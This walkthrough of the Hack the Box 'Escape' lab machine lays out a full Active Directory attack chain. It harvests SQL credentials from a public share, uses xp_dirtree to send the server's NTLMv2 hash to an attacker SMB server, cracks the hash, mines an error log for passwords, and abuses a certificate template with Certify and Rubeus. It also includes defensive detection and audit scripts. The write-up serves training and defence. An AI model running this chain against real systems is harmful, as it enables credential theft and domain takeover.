In this post, I would like to share a walkthrough of the Escape machine from Hack the Box.


This machine is rated medium on Hack the Box.

What will you gain from the Escape machine?


For the user flag, you will need to obtain the database credentials from a PDF file on a public share. With those, an SQL command makes the server authenticate to our smbserver, which captures an NTLMv2 hash; once cracked, it lets us log in with evil-winrm. Next, we get another set of credentials from the SQL Server error log file.


As for the root flag, you only need to retrieve the Administrator's NTLM hash by using tools such as Certify.exe and Rubeus.exe.

Information Gathering on Escape Machine


Once we have started the VPN connection (the connection pack is downloaded from Hack the Box), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -Pn

┌─[darknite@parrot]─[~/Document/htb/Escape]
└──╼ $nmap -sC -sV 10.10.11.202 -oA initial -Pn 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-03 02:17 EST
Nmap scan report for 10.10.11.202
Host is up (0.22s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-03 15:18:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: sequel
|   NetBIOS_Domain_Name: sequel
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: dc.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-03T13:51:43
|_Not valid after:  2053-03-03T13:51:43
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.08 seconds

From the nmap result, I notice that there is no HTTP service (port 80) open on the machine. What is exposed is a domain controller for sequel.htb (DNS, Kerberos, LDAP, SMB) together with Microsoft SQL Server 2019 on port 1433.

SMBclient enumeration


Let's enumerate the SMB shares on the machine; only the Public share name catches my attention.


Therefore, let's access the share by using smbclient.


There we find a PDF file that we can try to download to our attacker's machine.


Sadly, a plain get does not work because we get the error "NT_STATUS_NO_SUCH_FILE".


The file name contains spaces, so we wrap it in quotation marks as "SQL Server Procedures.pdf", and the download succeeds.


The two screenshots above show some useful information

Enumerate the server by running the impacket-mssqlclient and impacket-smbserver


Using the credentials found in the PDF, we start mssqlclient with the command "impacket-mssqlclient WORKGROUP/PublicUser:GuestCantWrite1@10.10.11.202".


Firstly, let's start our smbserver by executing the command "sudo impacket-smbserver <anyname> . -smb2support".


Then, from the mssqlclient session, we execute xp_dirtree '\\<yourIP>\<yourfile>', which makes the SQL Server service account connect to our SMB server.


At last, the smbserver captures an NTLMv2 hash that we can crack with John the Ripper.


The captured hash looks something like the one shown above.


Finally, John cracks the hash, giving us a username and password.
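The capture above works because xp_dirtree (and its siblings xp_fileexist and xp_subdirs) will happily open a UNC path, so the SQL Server service account authenticates to whatever host the path names. The detection below is an added example for this walkthrough, not part of the original post or of impacket: it scans an assumed "login=... stmt=..." export of SQL Server statement auditing (the lines are constructed) and flags any of these procedures called with a UNC host that is not on an allow-list. The allow-list hosts and the 10.10.11.0/24 subnet are assumptions.

```python
"""Flag SQL Server statements that make the service account authenticate to an
arbitrary SMB host. Added example for this walkthrough; audit lines are constructed."""
import ipaddress
import re

# Extended stored procedures that accept a path. Given a UNC path, the SQL Server
# service account opens it and so sends an NTLM authentication to that host.
COERCING_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Assumed allow-list: hosts and subnet the SQL Server legitimately reaches over SMB.
TRUSTED_HOSTS = {"dc", "dc.sequel.htb"}
TRUSTED_NETS = [ipaddress.ip_network("10.10.11.0/24")]

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")
PROC_RE = re.compile(r"\b(" + "|".join(COERCING_PROCS) + r")\b", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([\w.-]+)")  # host part of \\host\share\...

# Constructed sample of an assumed "login=... stmt=..." audit export (not real output).
SAMPLE_AUDIT = r"""
2023-03-03 15:20:01 login=PublicUser stmt=EXEC master..xp_dirtree '\\10.10.14.7\share', 1, 1
2023-03-03 15:20:05 login=sequel\backupsvc stmt=EXEC master..xp_dirtree '\\dc.sequel.htb\backups'
2023-03-03 15:20:09 login=PublicUser stmt=SELECT name FROM sys.databases
2023-03-03 15:20:12 login=PublicUser stmt=EXEC xp_fileexist '\\10.10.14.7\x\y.txt'
"""


def host_is_trusted(host: str) -> bool:
    """True if the UNC host is on the allow-list or inside a trusted subnet."""
    h = host.lower()
    if h in TRUSTED_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return False  # unknown DNS name: treat as untrusted
    return any(ip in net for net in TRUSTED_NETS)


def detect_smb_coercion(audit_text: str) -> list:
    """One finding per statement that calls a coercing procedure with a UNC path."""
    findings = []
    for raw in audit_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        proc = PROC_RE.search(m["stmt"])
        unc = UNC_RE.search(m["stmt"])
        if not (proc and unc):
            continue
        host = unc.group(1)
        findings.append({
            "time": m["ts"],
            "login": m["login"],
            "proc": proc.group(1).lower(),
            "host": host,
            "trusted": host_is_trusted(host),
        })
    return findings


def alerts(audit_text: str) -> list:
    """Findings whose UNC target is untrusted: the hash-capture pattern above."""
    return [f for f in detect_smb_coercion(audit_text) if not f["trusted"]]


if __name__ == "__main__":
    for f in alerts(SAMPLE_AUDIT):
        print(f"ALERT {f['time']} {f['login']} ran {f['proc']} against \\\\{f['host']}")
```

On the sample data the two PublicUser statements aimed at 10.10.14.7 are reported and the backup job pointed at the domain controller is not. The structural fixes are the usual ones: revoke EXECUTE on these procedures from low-privilege logins such as the guest account used here, block outbound SMB from the database server at the firewall, and give the service account a long random password (or a gMSA) so a captured NTLMv2 hash cannot be cracked the way it is in this walkthrough.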

Accessing the Escape machine via evil-winrm


We should be able to access the machine via evil-winrm with the credentials we found earlier: username sql_server and password REGGIE1234ronnie.


Nothing can be found within the Documents directory.


We find an SQL Server directory at the root of the drive, and there is some useful information hidden inside it.


There is a backup file, ERRORLOG.BAK, inside the Logs directory.


There should be something in it that we can use at a later stage.


After analyzing the log carefully, I notice one credential that we can use to access the machine as a different user.


Finally, we can access the machine with this second set of credentials.
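The error log is readable by a low-privilege shell here, and failed-login entries record whatever was typed into the user name field, which is how a secret ends up in a log. The scanner below is an added example for this walkthrough (not from the original post): it parses the real ERRORLOG "Login failed for user" layout over constructed sample lines and flags failed logins for names that do not exist and look more like a password than an account name. The heuristic in looks_like_secret is my own and is only a triage aid.

```python
"""Scan a SQL Server ERRORLOG for failed logins whose user name may actually be a
password typed into the wrong field. Added example; the log lines are constructed."""
import re

# ERRORLOG layout: "<date> <time> <source> <message>". Failed logins are written
# by the Logon source as "Login failed for user '<name>'. Reason: ... [CLIENT: ip]".
FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\.\s*Reason: (?P<reason>[^\[]+?)\s*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)
# Characters normally found in account names (DOMAIN\user, user@realm, dots, hyphens, $).
ACCOUNT_CHARS = re.compile(r"^[A-Za-z0-9._\\@$-]+$")

# Constructed sample log (the names and the secret-looking strings are invented).
SAMPLE_ERRORLOG = r"""
2023-03-03 15:21:00.12 Logon       Error: 18456, Severity: 14, State: 8.
2023-03-03 15:21:00.12 Logon       Login failed for user 'sequel\jdoe'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.11.50]
2023-03-03 15:21:07.44 Logon       Error: 18456, Severity: 14, State: 5.
2023-03-03 15:21:07.44 Logon       Login failed for user 'Autumn2022!Pass'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.50]
2023-03-03 15:21:30.10 Logon       Login failed for user 'Sp1cyCreds2023'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.50]
2023-03-03 15:21:45.03 Logon       Login failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.7]
2023-03-03 15:22:01.00 spid12s     Starting up database 'msdb'.
"""


def looks_like_secret(user: str) -> bool:
    """Heuristic: punctuation outside normal account-name characters, or a long
    mixed-case string with digits and no domain separator, reads like a password."""
    if not ACCOUNT_CHARS.match(user):
        return True
    if any(sep in user for sep in "\\@."):
        return False
    has_digit = any(c.isdigit() for c in user)
    mixed_case = user != user.lower() and user != user.upper()
    return len(user) >= 8 and has_digit and mixed_case


def scan_errorlog(text: str) -> list:
    """Parse every failed login; mark the ones that look like leaked secrets."""
    findings = []
    for line in text.splitlines():
        m = FAIL_RE.match(line.strip())
        if not m:
            continue
        reason = m["reason"].strip().rstrip(".")
        # "Could not find a login" means the string was never an account name at all.
        not_found = reason.startswith("Could not find a login")
        findings.append({
            "time": m["ts"],
            "user": m["user"],
            "reason": reason,
            "client": m["client"],
            "suspicious": not_found and looks_like_secret(m["user"]),
        })
    return findings


def suspicious_users(text: str) -> list:
    """Strings to report so the account owners can be told to rotate the password."""
    return [f["user"] for f in scan_errorlog(text) if f["suspicious"]]


if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['time']} {flag:10} user={f['user']!r} client={f['client']}")
```

A hit is an instruction to rotate that password wherever it is really used, and the path that made this walkthrough work is the Log directory's ACL: the SQL Server error log and its .BAK rotations should be readable only by the service account and administrators.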


We can read the user flag with the "type user.txt" command.

Escalating to Administrator Privileges


For this activity, we need Certify.exe, which can be downloaded here.


We upload Certify.exe to the victim's machine.


To ensure the binary works, we test it by executing it.


We can find a vulnerable certificate template by running the Certify.exe command.
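The walkthrough does not say which misconfiguration Certify reports, so the audit below assumes the common one, a template that lets the enrollee supply the subject name and issues logon-capable certificates to every domain account. It is an added example, not Certify's code and not from the original post: the flag bits and EKU OIDs are the real AD CS template schema values, while the template records and the list of broad principals are constructed, and the "enroll" field is a simplification of the real template security descriptor.

```python
"""Audit AD CS certificate templates for the pattern Certify reports as vulnerable.
Added example, not Certify's code; the template data below is constructed."""

# Flag bits and EKU OIDs from the AD CS template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Assumed list: enrollment granted to any of these means every domain account can enroll.
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}

# Constructed templates; "enroll" lists the principals holding the Enroll right.
SAMPLE_TEMPLATES = [
    {"name": "ConstructedWebServer", "msPKI-Certificate-Name-Flag": 1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll": ["Domain Users"]},
    {"name": "ConstructedUserLogon", "msPKI-Certificate-Name-Flag": 1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll": ["Domain Users"]},
    {"name": "ConstructedApprovedLogon", "msPKI-Certificate-Name-Flag": 1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 2,
     "msPKI-RA-Signature": 0, "enroll": ["Domain Users"]},
    {"name": "ConstructedAdminOnly", "msPKI-Certificate-Name-Flag": 1,
     "pKIExtendedKeyUsage": [], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll": ["Domain Admins"]},
]


def audit_template(t: dict) -> dict:
    """Evaluate the five conditions for one template; all true means vulnerable."""
    eku = set(t["pKIExtendedKeyUsage"])
    checks = {
        "enrollee_supplies_subject": bool(
            t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list means the certificate is valid for any purpose, logon included.
        "auth_eku": not eku or bool(eku & AUTH_EKUS),
        "no_manager_approval": not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_ra_signature": t["msPKI-RA-Signature"] == 0,
        "broad_enrollment": bool(set(t["enroll"]) & BROAD_PRINCIPALS),
    }
    return {"name": t["name"], "vulnerable": all(checks.values()), "checks": checks}


def find_vulnerable(templates: list) -> list:
    """Names of templates on which every condition holds."""
    return [r["name"] for r in map(audit_template, templates) if r["vulnerable"]]


def remediation(result: dict) -> str:
    """Smallest single change that breaks the chain for a vulnerable template."""
    if not result["vulnerable"]:
        return "no change needed"
    return ("clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the subject is built from AD, "
            "or set CT_FLAG_PEND_ALL_REQUESTS so a CA manager approves each request")


if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        r = audit_template(t)
        print(f"{r['name']:28} vulnerable={r['vulnerable']!s:5} {remediation(r)}")
```

Only ConstructedUserLogon trips all five checks: the web-server template lacks a logon EKU, the approved template is held for manager approval, and the admin-only template is not enrollable by ordinary accounts. Either remediation on its own is enough, and flipping the enrollment flag is the lower-risk change when the template is in active use.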


We request a certificate and its private key from the vulnerable template.


Later, we run an openssl command that saves the certificate as cert.pem and exports it as cert.pfx.


As a result, we can upload cert.pfx to the victim's machine.


We also need to upload Rubeus.exe to the victim's machine.


We should get the NTLM hash by running the Rubeus command.


Boom! At last, we have access to the machine as the Administrator user.


We can read the root flag with the "type root.txt" command.